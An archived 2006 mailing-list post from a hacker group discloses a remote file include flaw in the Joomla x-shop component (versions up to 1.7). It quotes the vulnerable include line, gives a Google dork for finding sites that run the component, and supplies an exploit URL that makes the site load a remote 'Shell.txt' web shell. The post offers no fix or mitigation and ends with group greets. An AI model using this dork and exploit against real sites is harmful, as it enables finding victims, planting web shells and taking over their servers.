|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Joomla x-shop <= 1.7 Remote File Include Vulnerability
crackers_child
sibersavascilar.com
Date: Fri Aug 18 2006 - 05:04:39 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------
Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability
--------------------------------------------------------------------------------
#Author: Crackers_Child
#contct: crackers_childsibersavascilar.com
--------------------------------------------------------------------------------
Google Dorks : allinurl:"/com_x-shop/"
------------------------- -------------------------------------------------------
Download : http://mamboxchange.com/frs/?group_id=187&release_id=1047
--------------------------------------------------------------------------------
Bug in admin.x-shop.php
<?
include($mosConfig_absolute_path.'/administrator/components/com_x-shop/languages/'.$mosConfig_lang.'.php');
session_start();
--------------------------------------------------------------------------------
Exploit:
http://www.site.com/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=Shell.txt?
--------------------------------------------------------------------------------
greets:
All My Friends And SiberSavascilar.Com Members !
--------------------------------------------------------------------------------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]